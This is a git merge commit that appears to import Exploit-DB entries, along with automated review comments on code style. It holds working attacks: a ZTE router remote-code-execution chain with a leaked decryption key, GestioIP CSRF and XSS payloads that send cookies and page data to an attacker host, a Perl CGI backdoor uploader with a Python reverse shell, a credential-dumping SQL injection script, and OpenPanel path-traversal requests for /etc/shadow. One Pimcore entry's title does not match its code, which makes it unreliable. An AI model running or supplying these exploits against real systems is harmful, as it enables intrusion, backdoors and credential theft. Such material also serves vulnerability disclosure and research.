Merge remote-tracking branch 'exploitdb/main'

This commit is contained in:
Brendan McDevitt 2025-04-16 00:01:37 +00:00
commit 3695da6995
15 changed files with 1139 additions and 0 deletions


@ -0,0 +1,331 @@
# Exploit Title: ZTE ZXHN H168N 3.1 - RCE via authentication bypass
# Author: l34n / tasos meletlidis
# Exploit Blog: https://i0.rs/blog/finding-0click-rce-on-two-zte-routers/
import http.client, requests, os, argparse, struct, zlib
from io import BytesIO
from os import stat
from Crypto.Cipher import AES
def login(host, port, username, password):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"Username": username,
"Password": password,
"Frm_Logintoken": "",
"action": "login"
}
requests.post(f"http://{host}:{port}/", headers=headers, data=data)
def logout(host, port):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_LogOff": "1",
"IF_LanguageSwitch": "",
"IF_ModeSwitch": ""
}
requests.post(f"http://{host}:{port}/", headers=headers, data=data)
def leak_config(host, port):
conn = http.client.HTTPConnection(host, port)
boundary = "---------------------------25853724551472601545982946443"
body = (
f"{boundary}\r\n"
'Content-Disposition: form-data; name="config"\r\n'
"\r\n"
"\r\n"
f"{boundary}--\r\n"
)
headers = {
"Content-Type": f"multipart/form-data; boundary={boundary}",
"Content-Length": str(len(body)),
"Connection": "keep-alive",
}
conn.request("POST", "/getpage.lua?pid=101&nextpage=ManagDiag_UsrCfgMgr_t.lp", body, headers)
response = conn.getresponse()
response_data = response.read()
with open("config.bin", "wb") as file:
file.write(response_data)
conn.close()
def _read_exactly(fd, size, desc="data"):
chunk = fd.read(size)
if len(chunk) != size:
return None
return chunk
def _read_struct(fd, fmt, desc="struct"):
size = struct.calcsize(fmt)
data = _read_exactly(fd, size, desc)
if data is None:
return None
return struct.unpack(fmt, data)
def read_aes_data(fd_in, key):
encrypted_data = b""
while True:
aes_hdr = _read_struct(fd_in, ">3I", desc="AES chunk header")
if aes_hdr is None:
return None
_, chunk_len, marker = aes_hdr
chunk = _read_exactly(fd_in, chunk_len, desc="AES chunk data")
if chunk is None:
return None
encrypted_data += chunk
if marker == 0:
break
cipher = AES.new(key.ljust(16, b"\0")[:16], AES.MODE_ECB)
fd_out = BytesIO()
fd_out.write(cipher.decrypt(encrypted_data))
fd_out.seek(0)
return fd_out
def read_compressed_data(fd_in, enc_header):
hdr_crc = zlib.crc32(struct.pack(">6I", *enc_header[:6]))
if enc_header[6] != hdr_crc:
return None
total_crc = 0
fd_out = BytesIO()
while True:
comp_hdr = _read_struct(fd_in, ">3I", desc="compression chunk header")
if comp_hdr is None:
return None
uncompr_len, compr_len, marker = comp_hdr
chunk = _read_exactly(fd_in, compr_len, desc="compression chunk data")
if chunk is None:
return None
total_crc = zlib.crc32(chunk, total_crc)
uncompressed = zlib.decompress(chunk)
if len(uncompressed) != uncompr_len:
return None
fd_out.write(uncompressed)
if marker == 0:
break
if enc_header[5] != total_crc:
return None
fd_out.seek(0)
return fd_out
def read_config(fd_in, fd_out, key):
ver_header_1 = _read_struct(fd_in, ">5I", desc="1st version header")
if ver_header_1 is None:
return
ver_header_2_offset = 0x14 + ver_header_1[4]
fd_in.seek(ver_header_2_offset)
ver_header_2 = _read_struct(fd_in, ">11I", desc="2nd version header")
if ver_header_2 is None:
return
ver_header_3_offset = ver_header_2[10]
fd_in.seek(ver_header_3_offset)
ver_header_3 = _read_struct(fd_in, ">2H5I", desc="3rd version header")
if ver_header_3 is None:
return
signed_cfg_size = ver_header_3[3]
file_size = stat(fd_in.name).st_size
fd_in.seek(0x80)
sign_header = _read_struct(fd_in, ">3I", desc="signature header")
if sign_header is None:
return
if sign_header[0] != 0x04030201:
return
sign_length = sign_header[2]
signature = _read_exactly(fd_in, sign_length, desc="signature")
if signature is None:
return
enc_header_raw = _read_exactly(fd_in, 0x3C, desc="encryption header")
if enc_header_raw is None:
return
encryption_header = struct.unpack(">15I", enc_header_raw)
if encryption_header[0] != 0x01020304:
return
enc_type = encryption_header[1]
if enc_type in (1, 2):
if not key:
return
fd_in = read_aes_data(fd_in, key)
if fd_in is None:
return
if enc_type == 2:
enc_header_raw = _read_exactly(fd_in, 0x3C, desc="second encryption header")
if enc_header_raw is None:
return
encryption_header = struct.unpack(">15I", enc_header_raw)
if encryption_header[0] != 0x01020304:
return
enc_type = 0
if enc_type == 0:
fd_in = read_compressed_data(fd_in, encryption_header)
if fd_in is None:
return
fd_out.write(fd_in.read())
def decrypt_config(config_key):
encrypted = open("config.bin", "rb")
decrypted = open("decrypted.xml", "wb")
read_config(encrypted, decrypted, config_key)
with open("decrypted.xml", "r") as file:
contents = file.read()
username = contents.split("IGD.AU2")[1].split("User")[1].split("val=\"")[1].split("\"")[0]
password = contents.split("IGD.AU2")[1].split("Pass")[1].split("val=\"")[1].split("\"")[0]
encrypted.close()
os.system("rm config.bin")
decrypted.close()
os.system("rm decrypted.xml")
return username, password
def change_log_level(host, port, log_level):
level_map = {
"critical": "2",
"notice": "5"
}
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_ACTION": "Apply",
"_BASICCONIG": "Y",
"LogEnable": "1",
"LogLevel": level_map[log_level],
"ServiceEnable": "0",
"Btn_cancel_LogManagerConf": "",
"Btn_apply_LogManagerConf": "",
"downloadlog": "",
"Btn_clear_LogManagerConf": "",
"Btn_save_LogManagerConf": "",
"Btn_refresh_LogManagerConf": ""
}
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)
def change_username(host, port, new_username, old_password):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_ACTION": "Apply",
"_InstID": "IGD.AU2",
"Right": "2",
"Username": new_username,
"Password": old_password,
"NewPassword": old_password,
"NewConfirmPassword": old_password,
"Btn_cancel_AccountManag": "",
"Btn_apply_AccountManag": ""
}
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_AccountManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/common_page/accountManag_lua.lua")
requests.post(f"http://{host}:{port}/common_page/accountManag_lua.lua", headers=headers, data=data)
def clear_log(host, port):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_ACTION": "clearlog"
}
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)
def refresh_log(host, port):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_ACTION": "Refresh"
}
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)
def trigger_rce(host, port):
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_StatusManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2fuserlog.txt&Menu3Location=0")
def rce(cmd):
return f"<? _G.os.execute('rm /var/userlog.txt;{cmd}') ?>"
def pwn(config_key, host, port):
leak_config(host, port)
username, password = decrypt_config(config_key)
login(host, port, username, password)
shellcode = "echo \"pwned\""
payload = rce(shellcode)
change_username(host, port, payload, password)
refresh_log(host, port)
change_log_level(host, port, "notice")
refresh_log(host, port)
trigger_rce(host, port)
clear_log(host, port)
change_username(host, port, username, password)
change_log_level(host, port, "critical")
logout(host, port)
print("[+] PoC complete")
def main():
parser = argparse.ArgumentParser(description="Run remote command on ZTE ZXHN H168N V3.1")
parser.add_argument("--config_key", type=lambda x: x.encode(), default=b"GrWM3Hz&LTvz&f^9", help="Leaked config encryption key from cspd")
parser.add_argument("--host", required=True, help="Target IP address of the router")
parser.add_argument("--port", required=True, type=int, help="Target port of the router")
args = parser.parse_args()
pwn(args.config_key, args.host, args.port)
if __name__ == "__main__":
main()
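Review bot: The `desc` parameter of `_read_exactly` and `_read_struct` is accepted but never read, so the descriptive strings passed at every call site (`desc="AES chunk header"` and the rest) have no effect; either drop the parameter or use it in a diagnostic at the point where the short read returns `None`. In `decrypt_config` both file handles are opened without `with` and are left open if the `split` chain at L172–L173 raises, and the cleanup shells out via `os.system("rm config.bin")` where `os.remove("config.bin")` does the same without spawning a shell. A module docstring stating that the script writes `config.bin` and `decrypted.xml` into the current working directory and deletes them afterwards would make the on-disk side effects visible to a reader.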


@ -0,0 +1,76 @@
# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Request Forgery (CSRF)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email : max.cybersecurity at belino.com
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50858
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50858
### Description
The GestioIP application has many endpoints and they are vulnerable to CSRF. This allows an attacker to execute actions through the admin's browser on the application if the admin visits a malicious URL hosted by the attacker. These actions can modify, delete, or exfiltrate data from the application.
### Prerequisites
The option "Manage - Manage GestioIP - User Management" must be enabled previously.
### Usage
To exploit this vulnerability, an attacker must host ```payload.html``` on an attacker-controlled web server (python3 -m http.server 8090). When an authenticated administrator goes to the attacker's website, the CSRF will execute making the attacker an administrator.
### File: payload.html
#### example: editing user named 'maxi'
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Welcome to our site</title>
<style>
body {
font-family: Arial, sans-serif;
text-align: center;
}
.container {
margin-top: 50px;
}
iframe {
display: none;
}
</style>
</head>
<body>
<div class="container">
<h1>Thank you for visiting our site!</h1>
<p>We are processing your request, please wait a moment...</p>
<img src="https://placehold.co/150?text=Processing" alt="Processing...">
</div>
<!-- hidden iframe -->
<iframe name="hiddenFrame"></iframe>
<!-- The form that makes the POST to GestioIP Server -->
<form action="[http://localhost/gestioip/res/ip_mod_user.cgi](http://localhost/gestioip/res/ip_mod_user.cgi)" method="POST" target="hiddenFrame">
<input type="hidden" name="name" value="maxi">
<input type="hidden" name="group_id" value="1">
<input type="hidden" name="email" value="maxi@test.com">
<input type="hidden" name="phone" value="123">
<input type="hidden" name="comment" value="">
<input type="hidden" name="client_id" value="1">
<input type="hidden" name="id" value="2">
<input type="hidden" name="B2" value="">
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
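Review bot: The `action` attribute of the form at L322 is wrapped in a markdown link, `[http://localhost/gestioip/res/ip_mod_user.cgi](http://localhost/gestioip/res/ip_mod_user.cgi)`, which looks like an artifact of the text passing through a markdown renderer rather than the author's intent; the committed file should carry the attribute as plain text so the listing is faithful to the original. The description names the consequence but not the root cause, presumably that `ip_mod_user.cgi` accepts the POST without an anti-CSRF token or origin check — worth stating explicitly, hedged if unconfirmed. None of the five GestioIP entries in this merge (this one, the stored XSS, reflected XSS, `ip_do_job` XSS and RCE entries) records a patched version or the vendor's fix; a `# Fixed in:` line, marked unknown if it is, would make the advisories more useful to defenders. The usage paragraph at L291 also puts triple backticks around `payload.html` inline, where single backticks are the intended markup.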


@ -0,0 +1,56 @@
# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Stored Cross-Site Scripting
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email: max.cybersecurity at belino.com
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50861
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50861
### Description
The http://localhost/gestioip/res/ip_mod_dns_key_form.cgi feature of GestioIP 3.5.7 is vulnerable to Stored XSS. An authenticated attacker with appropriate permissions can inject malicious code into the tsig_key form field and save it to the database. Once saved, any user who accesses the "DNS Key" page will trigger the Stored XSS, leading to the execution of malicious code.
### Prerequisites
1. Enable "DNS Key" Feature
First, ensure that "Dynamic DNS updates" is enabled in the global configuration:
Manage > Manage GestioIP > Global Configuration > Dynamic DNS updates enabled: yes
This will enable the following menus:
Manage > DNS Keys
Manage > DNS Update User
2. Create a DNS Key Entry
To create a new DNS key entry and also edit an existing one, the user must belong to a group with the "Manage Sites And Categories" permission. By default, "Admin" and "GestioIP Admin" groups have this permission.
Also, you can configure this permission to any group under:
Manage > User Groups > Manage Sites and Categories
3. Enter payload.
Once group permission is set, input one of the following payloads into the "TSIG Key" (tsig_key) field and save it.
### Payloads
1 - Test basic XSS
<script>alert("test")</script>
2 - Send data (cookies) to the attacker's server
<svg/onload="fetch('http://10.20.0.1:8000/steal_data',{method:'POST',body:document.cookie})">
3 - Redirect the user to a malicious site
<svg/onload="window.location='http://10.20.0.1:8090/malicious_page.html'">


@ -0,0 +1,58 @@
# Exploit Title: GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email (max.cybersecurity at belino.com)
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50859
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50859
### Description
The ip_import_acl_csv request is vulnerable to Reflected XSS (Reflected Cross-Site Scripting); the user can upload a file and the file content is reflected in the HTML response without being sanitized. If the file uploaded by the user has an incorrect format and an error occurs during its processing, part of the file's content may be displayed in the browser. If this content includes HTML or scripts and it is not properly escaped, the browser could interpret it, leading to a security vulnerability. This could allow data exfiltration and enabling CSRF (Cross-Site Request Forgery) attacks.
Proper input validation and output encoding are critical to prevent this vulnerability.
### Prerequisites
Enable (set to 'yes') the parameter:
Manage > Manage GestioIP > ACL connection management
### Usage
Select: import/export > Import ACLs/ACL Connections
Select: "Connection List"
Select "report only"
Browse to select the file you want to upload.
Click 'upload'
### Payloads
#### 1) html file to upload
<html><script src="http://10.20.0.1:8090/refxss_exfiltrate_3.js"></script></html>
#### 2) js file to exfiltrate data
var req1 = new XMLHttpRequest();
req1.open('GET',"http://localhost/gestioip/res/ip_show_user.cgi", false);
req1.send();
response = req1.responseText;
var req2 = new XMLHttpRequest();
req2.open('POST', "http://10.20.0.1:8000/steal_data", false);
req2.setRequestHeader('Content-Type', 'text/html');
req2.send(response);


@ -0,0 +1,34 @@
# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Scripting (XSS)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email (max.cybersecurity at belino.com)
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50857
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50857
### Description
The `"ip_do_job"` feature of GestioIP 3.5.7 is vulnerable to XSS, leading to data exfiltration and CSRF attacks. Two examples are described below.
### Prerequisites
To successfully exploit the XSS vulnerability, the user must be part of a "User Group" that has the following three permissions:
• Show backuped device configurations (read_device_config_perm)
• Upload device configurations (write_device_config_perm)
• Administrate CM (administrative_cm_perm)
1) vulnerable parameter: `host_id`
http://localhost/gestioip/res/cm/ip_do_job.cgi?client_id=1&host_id='<script>alert("test")</script>'
2) vulnerable parameter: `stored_config`
http://localhost/gestioip/res/cm/ip_do_job.cgi?client_id=1&stored_config='<script>alert("test")</script>'


@ -0,0 +1,102 @@
# Exploit Title: GestioIP 3.5.7 - Remote Command Execution (RCE)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email (max.cybersecurity at belino.com)
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-48760
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-48760
import requests
import sys
# Config
username = "gipadmin"
password = "PASSWORD"
domain = "localhost"
local_ip = "10.20.0.1"
local_port = 443
target_url = f"http://{domain}/gestioip/api/upload.cgi"
# CGI Backdoor Perl
backdoor_code = """#!/usr/bin/perl -w
use strict;
print "Cache-Control: no-cache\\n";
print "Content-type: text/html\\n\\n";
my $req = $ENV{QUERY_STRING};
chomp ($req);
$req =~ s/%20/ /g;
$req =~ s/%3b/;/g;
$req =~ s/%7c/|/gi;
$req =~ s/%27/'/g;
$req =~ s/%22/"/g;
$req =~ s/%5D/]/g;
$req =~ s/%5B/[/g;
print "<html><body>";
print '<!-- CGI backdoor -->';
if (!$req) {
print "Usage: http://domain/gestioip/api/upload.cgi?whoami";
} else {
print "Executing: $req";
}
print "<pre>";
my @cmd = `$req`;
print "</pre>";
foreach my $line (@cmd) {
print $line . "<br/>";
}
print "</body></html>";
"""
# Exploit functions
def upload_file(session, file_name, file_data):
"""Uploads the file to the server"""
files = {
'file_name': (None, file_name),
'leases_file': (file_name, file_data)
}
response = session.post(target_url, files=files)
if "OK" not in response.text:
print(f"[!] Error uploading {file_name}.")
sys.exit(1)
return response
def run_command(session, cmd):
"""Execute a command in the server through the vuln"""
url = target_url + '?' + cmd
resp = session.get(url)
print(resp.text)
def backdoor_exists(session):
"""Verifies if backdoor is already uploaded or not"""
response = session.get(target_url + "?whoami")
if "www-data" in response.text:
return True # backdoor already uploaded
return False # backdoor not uploaded yet
if __name__ == '__main__':
with requests.Session() as session:
session.auth = (username, password)
# Verify if backdoor is already uploaded
if not backdoor_exists(session):
print("\n[!] Uploading backdoor...\n")
upload_file(session, 'upload.cgi', backdoor_code)
else:
print("\n[+] Backdoor already uploaded. Continue...\n")
# Execute the reverse shell
print("\n[!] Executing reverse shell...\n")
reverse_shell_cmd = f'python3 -c "import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((\'{local_ip}\', {local_port})); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); p=subprocess.call([\'/bin/sh\', \'-i\']);"'
run_command(session, reverse_shell_cmd)


@ -0,0 +1,189 @@
# Exploit Title: Xinet Elegant 6 Asset Lib Web UI 6.1.655 - SQL Injection
# Exploit author: hyp3rlinx
import requests,time,re,sys,argparse
#NAPC Xinet Elegant 6 Asset Library v6.1.655
#Pre-Auth SQL Injection 0day Exploit
#By hyp3rlinx
#ApparitionSec
#UPDATED: Jan 2024 for python3
#TODO: add SSL support
#===============================
#This will dump tables, usernames and passwords in vulnerable versions
#REQUIRE PARAMS: LoginForm[password]=&LoginForm[rememberMe]=0&LoginForm[username]=SQL&yt0
#SQL INJECTION VULN PARAM --> LoginForm[username]
#================================================
IP=""
PORT="80"
URL=""
NUM_INJECTS=20
k=1
j=0
TABLES=False
CREDS=False
SHOW_SQL_ERROR=False
def vuln_ver_chk():
global IP, PORT
TARGET = "http://"+IP+":"+PORT+"/elegant6/login"
response = requests.get(TARGET)
if re.findall(r'\bElegant",appVersion:"6.1.655\b', response.content.decode()):
print("[+] Found vulnerable NAPC Elegant 6 Asset Library version 6.1.655.")
return True
print("[!] Version not vulnerable :(")
return False
def sql_inject_request(SQL):
global IP, PORT
URL = "http://"+IP+":"+PORT+"/elegant6/login"
tmp=""
headers = {'User-Agent': 'Mozilla/5.0'}
payload = {'LoginForm[password]':'1','LoginForm[rememberMe]':'0','LoginForm[username]':SQL}
session = requests.Session()
res = session.post(URL,headers=headers,data=payload)
idx = res.content.decode('utf-8').find('CDbCommand') # Start of SQL Injection Error in response
idx2 = res.content.decode('utf-8').find('key 1') # End of SQL Injection Error in response
return res.content[idx : idx2+3]
#Increments SQL LIMIT clause 0,1, 1,2, 1,3 etc
def inc():
global k,j
while j < NUM_INJECTS:
j+=1
if k !=1:
k+=1
return str(j)+','+str(k)
def tidy_up(results):
global CREDS
idx = results.find("'".encode())
if idx != -1:
idx2 = results.rfind("'".encode())
if not CREDS:
return results[idx + 1: idx2 -2]
else:
return results[idx + 2: idx2]
def breach(i):
global k,j,NUM_INJECTS,SHOW_SQL_ERROR
result=""
#Dump Usernames & Passwords
if CREDS:
if i % 2 == 0:
target='username'
else:
target='password'
SQL=('"and (select 1 from(select count(*),concat((select(select concat(0x2b,'+target+'))'
'from user limit '+str(i)+', 1),floor(rand(0)*2))x from user group by x)a)-- -')
if not SHOW_SQL_ERROR:
result = tidy_up(sql_inject_request(SQL))
if result:
result = result.decode()
else:
result = sql_inject_request(SQL)+"\n"
if result:
result = result.decode()
print("[+] Dumping "+str(target)+": "+str(result))
#Dump Tables
if TABLES:
while j < NUM_INJECTS:
nums = inc()
SQL=('"and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database()'
'limit '+nums+'),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -')
if not SHOW_SQL_ERROR:
result = tidy_up(sql_inject_request(SQL))
else:
result = sql_inject_request(SQL) + "\n"
if result:
print("[+] Dumping Table... " +str(result.decode()))
time.sleep(0.3)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--ip_address", help="<TARGET-IP>.")
parser.add_argument("-p", "--port", help="Port, Default is 80")
parser.add_argument("-t", "--get_tables", nargs="?", const="1", help="Dump Database Tables.")
parser.add_argument("-c", "--creds", nargs="?", const="1", help="Dump Database Credentials.")
parser.add_argument("-m", "--max_injects", nargs="?", const="1", help="Max SQL Injection Attempts, Default is 20.")
parser.add_argument("-s", "--show_sql_errors", nargs="?", const="1", help="Display SQL Errors, Default is Clean Dumps.")
parser.add_argument("-e", "--examples", nargs="?", const="1", help="Show script usage.")
return parser.parse_args()
def usage():
print("Dump first ten rows of usernames and passwords")
print("NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -c -m 10\n")
print("\nDump first five rows of database tables and show SQL errors")
print("NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -t -m 5 -s\n")
print("NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -p80 -t -c -m30\n")
exit(0)
def main(args):
global TABLES,CREDS,URL,IP,NUM_INJECTS,SHOW_SQL_ERROR
if args.ip_address:
IP=args.ip_address
if args.port:
PORT=args.port
if args.get_tables:
TABLES=True
if args.creds:
CREDS=True
if args.max_injects:
NUM_INJECTS = int(args.max_injects)
if args.show_sql_errors:
SHOW_SQL_ERROR=True
if args.examples:
usage()
if vuln_ver_chk():
for i in range(0, NUM_INJECTS):
breach(i)
time.sleep(0.3)
if __name__=='__main__':
parser = argparse.ArgumentParser()
print("NAPC Elegant 6 Asset Library v6.1.655")
print("Pre-Authorization SQL Injection 0day Exploit")
print("Discovery / eXploit By hyp3rlinx")
print("ApparitionSec\n")
time.sleep(0.5)
if len(sys.argv)== 1:
parser.print_help(sys.stderr)
sys.exit(0)
main(parse_args())
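Review bot: The `argparse.ArgumentParser()` created in the `__main__` block at L664 is a fresh parser with no arguments, so `parser.print_help(sys.stderr)` at L671 prints only the program name and `-h`; the options live on the parser built inside `parse_args()`, so the help path should use that parser (for example build it once at module level, or have `parse_args()` expose it). In `main()` the `global` statement at L644 lists `IP` but not `PORT`, so `PORT=args.port` at L648 binds a local that is discarded and the module-level `PORT` is never updated, while `URL` is declared global there but never read. `usage()` ends with the builtin `exit(0)`, which is intended for the interactive interpreter; `sys.exit(0)` is the form for a script.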


@ -0,0 +1,42 @@
# Exploit Title: Pimcore customer-data-framework 4.2.0 - SQL injection
# Date: 01/28/2025
# Exploit Author: maeitsec
# Vendor Homepage: https://pimcore.com/
# Software Link: https://github.com/pimcore/pimcore
# Version: Pimcore versions prior to 10.5.21
# Tested on: Ubuntu 20.04 with Pimcore 10.5.20
# CVE: CVE-2024-11956
import requests
# Replace with target URL and credentials
TARGET_URL = "http://example.com/pimcore"
USERNAME = "low_privilege_user"
PASSWORD = "password123"
# Authenticate and get session
session = requests.Session()
login_data = {
"username": USERNAME,
"password": PASSWORD
}
login_response = session.post(f"{TARGET_URL}/admin/login", data=login_data)
if "Login successful" in login_response.text:
print("[+] Authenticated successfully.")
# Exploit the downloadAsZip functionality
download_url = f"{TARGET_URL}/admin/asset/download-as-zip"
payload = {
"ids[]": ["1", "2", "3"] # Replace with IDs of restricted files/folders
}
download_response = session.post(download_url, data=payload)
if download_response.status_code == 200:
print("[+] Exploit successful. Restricted files downloaded.")
with open("restricted_files.zip", "wb") as f:
f.write(download_response.content)
else:
print("[-] Exploit failed. Server returned:", download_response.status_code)
else:
print("[-] Authentication failed.")
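Review bot: The header and the body of this entry do not describe the same issue: the title says `customer-data-framework 4.2.0 - SQL injection`, the `# Version:` line says Pimcore prior to 10.5.21, and the script itself posts asset `ids[]` to `/admin/asset/download-as-zip` and checks only the HTTP status, which reads as an authorization-check PoC rather than a SQL injection. Either the title or the PoC should be reconciled against the CVE-2024-11956 description before this is indexed. A one-line comment above `download_url` stating what the request is expected to demonstrate would also make the intent clear to a reader.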


@ -0,0 +1,30 @@
# Exploit Title: Authenticated Stored Cross-Site Scripting (XSS) Via Search
Document
# Google Dork: N/A
# Date: 1/28/2025
# Exploit Author: maeitsec
# Vendor Homepage: https://pimcore.com/
# Software Link: https://github.com/pimcore/pimcore
# Version: Pimcore 10.5.x (prior to 10.5.21) and 11.x (prior to 11.1.1)
# Tested on: Pimcore 10.5.20 on Ubuntu 20.04
# CVE: CVE-2024-11954
---
### Description:
A stored Cross-Site Scripting (XSS) vulnerability exists in Pimcore's Data
Object Classification Store functionality. The vulnerability arises due to
insufficient input sanitization, allowing an authenticated attacker with
access to the classification store to inject malicious JavaScript code.
This code is then executed in the context of other users' browsers when
they view the affected data.
### Proof of Concept (PoC):
1. Log in to the Pimcore backend as a user with access to the Data Object
Classification Store.
2. Navigate to the Classification Store and create or edit a key.
3. Inject the following payload into the key value:
```html
<script>alert('XSS')</script>
4. Save the file and view it in the frontend or backend. The JavaScript
alert will execute, demonstrating the vulnerability.
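Review bot: The `# Exploit Title:` header is broken across L718–L719 (`Via Search` / `Document`), so the second half sits on an unprefixed line, and the title does not match the description, which concerns the Data Object Classification Store rather than a search document; the header should be a single line naming the affected feature. The ```html fence opened at L741 is never closed, so in rendered markdown step 4 is swallowed into the code block; a closing fence after the payload line fixes it. "Save the file" in step 4 also appears to mean saving the key entry, since step 2 edits a key rather than a file.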


@ -0,0 +1,80 @@
# Exploit Title: OpenPanel 0.3.4 - Directory Traversal
# Date: Dec 05, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53537
### Compress Function ###
POST /compress_files HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 96
Origin: https://demo.openpanel.org:2083
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
archiveName=/home/stefan/test/test3&selectedFiles%5B%5D=shadow&pathParam=../../etc&extension=tar
### Copy Function ###
POST /copy_item?item_name=shadow&path_param=/etc&item_type=text%2Fplain&destination_path=/home/stefan/ HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Origin: https://demo.openpanel.org:2083
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Content-Length: 0
Te: trailers
### Download Function ###
GET /download_file/shadow?path_param=/etc HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
### View Function ###
GET /view_file?filename=shadow&path_param=/etc HTTP/2
